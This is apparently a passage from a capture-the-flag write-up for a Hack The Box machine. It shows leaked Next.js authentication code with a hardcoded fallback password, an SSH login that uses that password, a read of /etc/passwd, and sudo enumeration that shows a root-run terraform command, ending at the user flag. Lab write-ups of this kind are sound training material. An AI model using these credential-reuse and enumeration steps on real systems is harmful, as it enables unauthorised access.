S_API="PAGES_API",e.APP_PAGE="APP_PAGE",e.APP_ROUTE="APP_RO
UTE",e.IMAGE="IMAGE",e}({})},9832:(e,n,r)=>{r.r(n),r.d(n,{c
onfig:()=>l,default:()=>P,routeModule:()=>A});var t={};r.r(
t),r.d(t,{default:()=>p});var a=r(3480),s=r(8667),i=r(6435)
;let u=require("next-auth/providers/credentials"),o={sessio
n:{strategy:"jwt"},providers:[r.n(u)()({name:"Credentials",
credentials:{username:{label:"User",type:"username"},passwo
rd:{label:"Password",type:"password"}},authorize:async e=>e
?.username==="jeremy"&&e.password===(process.env.ADMIN_SECR
ET??"MyNameIsJeremyAndILovePancakes")?{id:"1",name:"Jeremy"
}:null})],pages:{signIn:"/signin"},secret:process.env.NEXTA
UTH_SECRET},d=require("next-auth"),p=r.n(d)()(o),P=(0,i.M)(
t,"default"),l=(0,i.M)(t,"config"),A=new a.PagesAPIRouteMod
ule({definition:{kind:s.A.PAGES_API,page:"/api/auth/[...nex
tauth]",pathname:"/api/auth/[...nextauth]",bundlePath:"",fi
lename:""},userland:t})}};var n=require("../../../webpack-a
pi-runtime.js");n.C(e);var r=n(n.s=9832);module.exports=r})
();
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # ssh jeremy@previous.htb
jeremy@previous.htb's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-152-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Thu Sep 4 05:50:20 AM UTC 2025
System load: 0.09 Processes: 215
Usage of /: 69.3% of 8.76GB Users logged in: 0
Memory usage: 8% IPv4 address for eth0: 10.10.11.83
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
1 update can be applied immediately.
1 of these updates is a standard security update.
To see these additional updates run: apt list --upgradable
1 additional security update can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Sep 4 05:50:53 2025 from 10.10.14.25
jeremy@previous:~$ id
uid=1000(jeremy) gid=1000(jeremy) groups=1000(jeremy)
jeremy@previous:~$ whoami
jeremy
jeremy@previous:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
jeremy:x:1000:1000:,,,:/home/jeremy:/bin/bash
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
jeremy@previous:~$ sudo -l
[sudo] password for jeremy:
Sorry, try again.
[sudo] password for jeremy:
Matching Defaults entries for jeremy on previous:
!env_reset, env_delete+=PATH, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User jeremy may run the following commands on previous:
(root) /usr/bin/terraform -chdir\=/opt/examples apply
jeremy@previous:~$ ls -al
total 36
drwxr-x--- 4 jeremy jeremy 4096 Aug 21 20:24 .
drwxr-xr-x 3 root root 4096 Aug 21 20:09 ..
lrwxrwxrwx 1 root root 9 Aug 21 19:57 .bash_history -> /dev/null
-rw-r--r-- 1 jeremy jeremy 220 Aug 21 17:28 .bash_logout
-rw-r--r-- 1 jeremy jeremy 3771 Aug 21 17:28 .bashrc
drwx------ 2 jeremy jeremy 4096 Aug 21 20:09 .cache
drwxr-xr-x 3 jeremy jeremy 4096 Aug 21 20:09 docker
-rw-r--r-- 1 jeremy jeremy 807 Aug 21 17:28 .profile
-rw-rw-r-- 1 jeremy jeremy 150 Aug 21 18:48 .terraformrc
-rw-r----- 1 root jeremy 33 Sep 4 04:01 user.txt
jeremy@previous:~$ cat user.txt
b4b0379688c2834*********